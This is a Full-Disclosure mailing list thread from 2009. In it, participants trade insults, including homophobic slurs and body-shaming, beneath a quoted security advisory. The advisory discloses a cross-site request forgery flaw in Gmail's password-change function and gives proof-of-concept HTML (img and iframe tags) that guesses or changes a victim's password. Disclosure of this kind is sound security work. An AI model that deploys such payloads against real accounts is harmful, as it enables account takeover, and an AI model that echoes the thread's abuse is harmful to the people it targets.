-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 'stache,
Perhaps his current lack of methamphetamines is the cause of his extra girth. Mr. Starks, I suggest immediately going off the low-reward, mass- marketed and overpriced muscle muscle milk and doing a bit of cardiovascular exercise until you've lost some of that fat, fatass. - -bm On Wed, 04 Mar 2009 19:59:41 -0500 Valdis' Mustache <[email protected]> wrote: >Rob, > >Our young scholar does nonetheless have some sage advice for young >ladies of >colour. > >http://www.helium.com/items/250130-advice-to-black-females > >I was rather alarmed at his arrest and methamphetamine abuse, >however one >might presume that his recent weight training is part of a >rehabilitation >regimen. > >http://www.coloradoan.com/article/20090117/NEWS01/901170316/1002/ > > >Your humble servant, >Усы из Валдис > > >On Wed, Mar 4, 2009 at 6:44 PM, <[email protected]> >wrote: >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> Mr. Stark, >> >> You're body fat seems to be fairly high, you should consider a >> cutting phase and quitting the muscle milk and whatever cheap >> steroids you use. Your looking like a fat dumb homosexual in >those >> tights. Someone with you're levels of insecurity shouldn't be >in >> computer security. >> >> - -bm >> >> On Wed, 04 Mar 2009 16:44:50 -0500 Jason Starks >> <[email protected]> wrote: >>>Ah, probably not. Your stringing together words to make >sentences >>>is what >>>I'll regret reading. I'll continue to use my muscle milk and >>>you'll continue >>>to work your 9-5. The world turns once again! >>> >>>On Wed, Mar 4, 2009 at 4:06 PM, Valdis' Mustache < >>>[email protected]> wrote: >>> >>>> Mister Snarks, >>>> >>>> I've never been anything but who I purport to be, the humble >>>upper >>>> facial hair quadrant of a loquacious sysadmin. Low of birth, >>>though >>>> noble in aspiration, a student of history and of the many >>>mustaches >>>> who came before myself. >>>> >>>> You, young scholar, should be wary, though! Prospective >>>employers do >>>> make regular use of search engines, "googling" potential >>>candidates to >>>> gain insight into possible character flaws! >>>> >>>> True, your clean and jerk abilities as archived on the YouTube >>>are >>>> admirable, but acting a fool on security lists is something >>>normally >>>> reserved only for those in academia, who are markedly >difficult >>>if not >>>> impossible to unseat from their comfortable chairs, as >>>indisputably >>>> underscored by the e-antics of this mutache's owner, and, of >>>course, >>>> Mssr. Schmehl. >>>> >>>> You'll come to regret your lack of anonymity, as your posts >will >>>live >>>> on for eternity, much as I've came to regret my unfortunate >>>> association with the unruly beardlike growth connecting to me >>>from the >>>> south, and my unavoidable tenuous connection with those >>>objectionable >>>> and uncouth sideburns. >>>> >>>> >>>> Your humble servant, >>>> I baffi di Valdis >>>> >>>> On Wed, Mar 4, 2009 at 12:55 PM, Jason Starks >>><[email protected]> >>>> wrote: >>>> > I know, its insane. It is a new trend, though, just like >>>people >>>> registering >>>> > gmail accounts just to flame and troll on FD! >>>> > >>>> > Its like, your credability like, goes like, ok you start >like >>>at 0, and >>>> then >>>> > like, it goes like to -1, and like, then even lower like. >>>> > >>>> > Absolutely genius. >>>> > >>>> > x0x0x0x0x0x0x0x0x0x >>>> > >>>> > On Tue, Mar 3, 2009 at 6:28 PM, Biz Marqee >>><[email protected]> wrote: >>>> >> >>>> >> This was 2 years well spent... NOT! >>>> >> >>>> >> Seriously what is with all these people popping up >releasing >>>advisories >>>> >> that are absolute SHIT? Is it to try and get jobs or what? >>>> >> >>>> >> >>>> >> On Tue, Mar 3, 2009 at :55 AM, ISecAuditors Security >>>Advisories < >>>> >> advisories at isecauditors.com> wrote: >>>> >> >>>> >> > ============================================= >>>> >> > INTERNET SECURITY AUDITORS ALERT 2007-003 >>>> >> > - Original release date: August 1st, 2007 >>>> >> > - Last revised: January 11th, 2009 >>>> >> > - Discovered by: Vicente Aguilera Diaz >>>> >> > - Severity: 3/5 >>>> >> > ============================================= >>>> >> > >>>> >> > I. VULNERABILITY >>>> >> > ------------------------- >>>> >> > CSRF vulnerability in GMail service >>>> >> > >>>> >> > II. BACKGROUND >>>> >> > ------------------------- >>>> >> > Gmail is Google's free webmail service. It comes with >built- >>>in Google >>>> >> > search technology and over 2,600 megabytes of storage >(and >>>growing >>>> >> > every day). You can keep all your important messages, >files >>>and >>>> >> > pictures forever, use search to quickly and easily find >>>anything >>>> >> > you're looking for, and make sense of it all with a new >way >>>of viewing >>>> >> > messages as part of conversations. >>>> >> > >>>> >> > III. DESCRIPTION >>>> >> > ------------------------- >>>> >> > Cross-Site Request Forgery, also known as one click >attack >>>or session >>>> >> > riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a >>>kind of >>>> >> > malicious exploit of websites. Although this type of >attack >>>has >>>> >> > similarities to cross-site scripting (XSS), cross-site >>>scripting >>>> >> > requires the attacker to inject unauthorized code into a >>>website, >>>> >> > while cross-site request forgery merely transmits >>>unauthorized >>>> >> > commands from a user the website trusts. >>>> >> > >>>> >> > GMail is vulnerable to CSRF attacks in the "Change >>>Password" >>>> >> > functionality. The only token for authenticate the user >is >>>a session >>>> >> > cookie, and this cookie is sent automatically by the >>>browser in every >>>> >> > request. >>>> >> > >>>> >> > An attacker can create a page that includes requests to >the >>>"Change >>>> >> > password" functionality of GMail and modify the passwords >>>of the users >>>> >> > who, being authenticated, visit the page of the attacker. >>>> >> > >>>> >> > The attack is facilitated since the "Change Password" >>>request can be >>>> >> > realized across the HTTP GET method instead of the POST >>>method that is >>>> >> > realized habitually across the "Change Password" form. >>>> >> > >>>> >> > IV. PROOF OF CONCEPT >>>> >> > ------------------------- >>>> >> > 1. An attacker create a web page "csrf-attack.html" that >>>realize many >>>> >> > HTTP GET requests to the "Change Password" functionality. >>>> >> > >>>> >> > For example, a password cracking of 3 attempts (see >>>"OldPasswd" >>>> >> > parameter): >>>> >> > ... >>>> >> > <img >>>> >> > src=" >>>> >> > >>>> >> > >>>> >>>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&g >ro >>>up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc12 >3& >>>p=&save=Save >>>> >> > "> >>>> >> > <img >>>> >> > src=" >>>> >> > >>>> >> > >>>> >>>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&g >ro >>>up1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc12 >3& >>>p=&save=Save >>>> >> > "> >>>> >> > <img >>>> >> > src=" >>>> >> > >>>> >> > >>>> >>>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&g >ro >>>up1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc12 >3& >>>p=&save=Save >>>> >> > "> >>>> >> > ... >>>> >> > >>>> >> > or with hidden frames: >>>> >> > ... >>>> >> > <iframe >>>> >> > src=" >>>> >> > >>>> >> > >>>> >>>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&g >ro >>>up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc12 >3& >>>p=&save=Save >>>> >> > "> >>>> >> > <iframe >>>> >> > src=" >>>> >> > >>>> >> > >>>> >>>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&g >ro >>>up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc12 >3& >>>p=&save=Save >>>> >> > "> >>>> >> > <iframe >>>> >> > src=" >>>> >> > >>>> >> > >>>> >>>https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&g >ro >>>up1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc12 >3& >>>p=&save=Save >>>> >> > "> >>>> >> > ... >>>> >> > >>>> >> > The attacker can use deliberately a weak new password >(see >>>"Passwd" >>>> >> > and "PasswdAgain" parameters), this way he can know if >the >>>analysed >>>> >> > password is correct without need to modify the password >of >>>the victim >>>> >> > user. >>>> >> > >>>> >> > Using weak passwords the "Change Password" response is: >>>> >> > - " The password you gave is incorrect. ", if the >analysed >>>password >>>> >> > is not correct. >>>> >> > - " We're sorry, but you've selected an insecure >password. >>>In order >>>> >> > to protect the security of your account, please click >>>"Password >>>> >> > Strength" to get tips on choosing to safer password. ", >if >>>the >>>> >> > analysed password is correct and the victim password is >not >>>modified. >>>> >> > >>>> >> > If the attacker want to modify the password of the victim >>>user, the >>>> >> > waited response message is: " Your new password has been >>>saved - OK ". >>>> >> > >>>> >> > In any case, the attacker evades the restrictions imposed >>>by the >>>> >> > captcha of the authentication form. >>>> >> > >>>> >> > 2. A user authenticated in GMail visit the "csrf- >>>attack.html" page >>>> >> > controlled by the attacker. >>>> >> > >>>> >> > For example, the attacker sends a mail to the victim (a >>>GMail account) >>>> >> > and provokes that the victim visits his page (social >>>engineering). So, >>>> >> > the attacker insures himself that the victim is >>>authenticated. >>>> >> > >>>> >> > 3. The password cracking is executed transparently to the >>>victim. >>>> >> > >>>> >> > V. BUSINESS IMPACT >>>> >> > ------------------------- >>>> >> > - Selective DoS on users of the GMail service (changing >>>user >>>> password). >>>> >> > - Possible access to the mail of other GMail users. >>>> >> > >>>> >> > VI. SYSTEMS AFFECTED >>>> >> > ------------------------- >>>> >> > Gmail service. >>>> >> > >>>> >> > VII. SOLUTION >>>> >> > ------------------------- >>>> >> > No solution provided by vendor. >>>> >> > >>>> >> > VIII. REFERENCES >>>> >> > ------------------------- >>>> >> > http://www.gmail.com >>>> >> > >>>> >> > IX. CREDITS >>>> >> > ------------------------- >>>> >> > This vulnerability has been discovered and reported by >>>> >> > Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) >>>com). >>>> >> > >>>> >> > X. REVISION HISTORY >>>> >> > ------------------------- >>>> >> > July 31, 2007: Initial release >>>> >> > August 1, 2007: Fewer corrections. >>>> >> > December 30, 2008: Last details. >>>> >> > >>>> >> > XI. DISCLOSURE TIMELINE >>>> >> > ------------------------- >>>> >> > July 30, 2007: Vulnerability acquired by >>>> >> > Internet Security Auditors. >>>> >> > August 1, 2007: Initial notification sent to the >>>> >> > Google security team. >>>> >> > August 1, 2007: Google security team request >additional >>>> >> > information. >>>> >> > about and start review the >>>vulnerability. >>>> >> > August 13, 2007: Request information about the status. >>>> >> > August 15, 2007: Google security team responds that >they >>>are still >>>> >> > working on this. >>>> >> > September 19, 2007: Request for the status. No response. >>>> >> > November 26, 2007: Request for the status. No response. >>>> >> > January 2, 2008: Request for the status. No response. >>>> >> > January 4, 2008: Request for the status. No response. >>>> >> > January 11, 2008: Request for the status. No response. >>>> >> > January 15, 2008: Request for the status. Automated >>>response. >>>> >> > January 18, 2008: Google security team informs that >don't >>>expect >>>> >> > behaviour to change in the short term >>>giving >>>> >> > the justification. >>>> >> > We deconstruct those arguments as >>>insufficient. >>>> >> > No more responses. >>>> >> > December 30, 2008: Request for the status. Confirmation >>>from Google >>>> >> > they won't change the consideration >>>about this. >>>> >> > January 11, 2009: Publication to Bugtraq. Rejected >twice. >>>> >> > No reasons. >>>> >> > March 03, 2009: General publication for disclosure in >>>other lists. >>>> >> > >>>> >> > XII. LEGAL NOTICES >>>> >> > ------------------------- >>>> >> > The information contained within this advisory is >supplied >>>"as-is" >>>> >> > with no warranties or guarantees of fitness of use or >>>otherwise. >>>> >> > Internet Security Auditors accepts no responsibility for >>>any damage >>>> >> > caused by the use or misuse of this information. >>>> >> > >>>> >> > _______________________________________________ >>>> >> > Full-Disclosure - We believe in it. >>>> >> > Charter: http://lists.grok.org.uk/full-disclosure- >>>charter.html >>>> >> > Hosted and sponsored by Secunia - http://secunia.com/ >>>> >> > >>>> >> >>>> >> _______________________________________________ >>>> >> Full-Disclosure - We believe in it. >>>> >> Charter: http://lists.grok.org.uk/full-disclosure- >>>charter.html >>>> >> Hosted and sponsored by Secunia - http://secunia.com/ >>>> > >>>> > >>>> > _______________________________________________ >>>> > Full-Disclosure - We believe in it. >>>> > Charter: http://lists.grok.org.uk/full-disclosure- >charter.html >>>> > Hosted and sponsored by Secunia - http://secunia.com/ >>>> > >>>> >> -----BEGIN PGP SIGNATURE----- >> Charset: UTF8 >> Version: Hush 3.0 >> Note: This signature can be verified at >https://www.hushtools.com/verify >> >> >wpwEAQMCAAYFAkmvIAQACgkQhNp8gzZx3sifPQP/Z/JwoxHfL+/YWIumE6ohkDzHigc >M >> >FFMGnJtPy1PUYahP2Kkq4oBUiFgNsqWsBjvNnp+hrILgO6w73OasuLZQSvYX7hCMK8k >1 >> >eK7r0H5fjSlqoRhkJSGhgBDL4H7q1nMrkr0x4zGO7Jeeeq8DuU23x2A1UvnJCE+RAo6 >5 >> vFaHNwE= >> =uYwk >> -----END PGP SIGNATURE----- >> >> -- >> Click to find information on your credit score and your credit >report. >> >http://tagline.hushmail.com/fc/BLSrjkqeNwyn7W35g2EhsFTPSKje8aswj4QT >ZvrXUmflUijsGrXajBFpRZG/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmvJVcACgkQhNp8gzZx3siNoAP/TSO6qJuQJQtmYHF07iGl8er0PaWH Ex1h8pgn5VsRfLR8csI1u5wO7KaUfB3xOyVDhhXecDqjqlleVg/tmipFSYdxMrGQ9M/S nPfw6hbOmRNHeq4Eb4YPtom3TDqQL/UCNZ3TQqX0Cs596qwWq6L3xAKIYFUF0YQU75ww /WW0y/k= =u4xa -----END PGP SIGNATURE----- -- Click to get your online credit check report & score. http://tagline.hushmail.com/fc/BLSrjkqeMi6a6MD4j780sX3er6QPy2RyA1vqHrpNmPLz9Ty6hgD1SQwVDKw/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
